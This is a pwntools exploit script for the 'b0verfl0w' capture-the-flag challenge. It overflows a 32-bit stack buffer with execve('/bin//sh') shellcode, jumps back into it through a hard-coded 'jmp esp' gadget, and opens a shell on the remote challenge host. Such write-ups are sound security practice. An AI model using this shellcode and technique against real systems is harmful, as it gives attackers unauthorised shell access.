x_ctf_b0verfl0w
Exploit script (exp):
from pwn import *
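# Exploit script for the b0verfl0w CTF challenge: a stack overflow on a
# 32-bit binary that returns into code placed in the overflowed buffer.
#
# The technique depends on three properties that are not visible in this
# script and are inferred from it -- confirm with `checksec`:
#   * the stack is executable (NX would block running the buffer),
#   * there is no stack canary between the buffer and the return address,
#   * the binary is not position-independent, so the gadget address is fixed.

# pwntools reads the target architecture from this ELF; asm() below assembles
# for it.
context.binary = './b0verfl0w'
# Local run for debugging instead of the hosted challenge instance:
#io = process('./b0verfl0w')
io = remote('node3.buuoj.cn','27459')

# Address of a `jmp esp` instruction inside the binary (hard-coded, see the
# PIE note above).
jmp_esp = 0x8048504

# 32 bytes of i386 code: loads eax with 0x0b (execve), pushes the string
# "/bin//sh" and ends in int 0x80.
# Bytes literals are required: p32() and asm() return bytes, and on Python 3
# concatenating them onto a str raises TypeError. b"..." is still a plain str
# on Python 2, so the script keeps working there.
shellcode = b"\x68\xcd\x80\x68\x68\xeb\xfc\x68"
shellcode += b"\x6a\x0b\x58\x31\xd2\x52\x68\x2f"
shellcode += b"\x2f\x73\x68\x68\x2f\x62\x69\x6e"
shellcode += b"\x89\xe3\x52\x53\x89\xe1\xeb\xe1"

# Payload layout, by offset from the start of the input:
#   0x00..0x1f  shellcode
#   0x20..0x23  filler
#   0x24..0x27  overwritten return address (presumably; the offset comes from
#               the ljust below) -> jmp esp
#   0x28..      short stub that runs once control lands after the return slot
payload = shellcode
payload = payload.ljust(0x24, b'a')
payload += p32(jmp_esp)
# After the return, esp points just past the return slot (input offset 0x28),
# so subtracting 0x28 moves it back to input offset 0 before jumping there.
payload += asm('sub esp,0x28;jmp esp')
io.sendline(payload)
io.interactive()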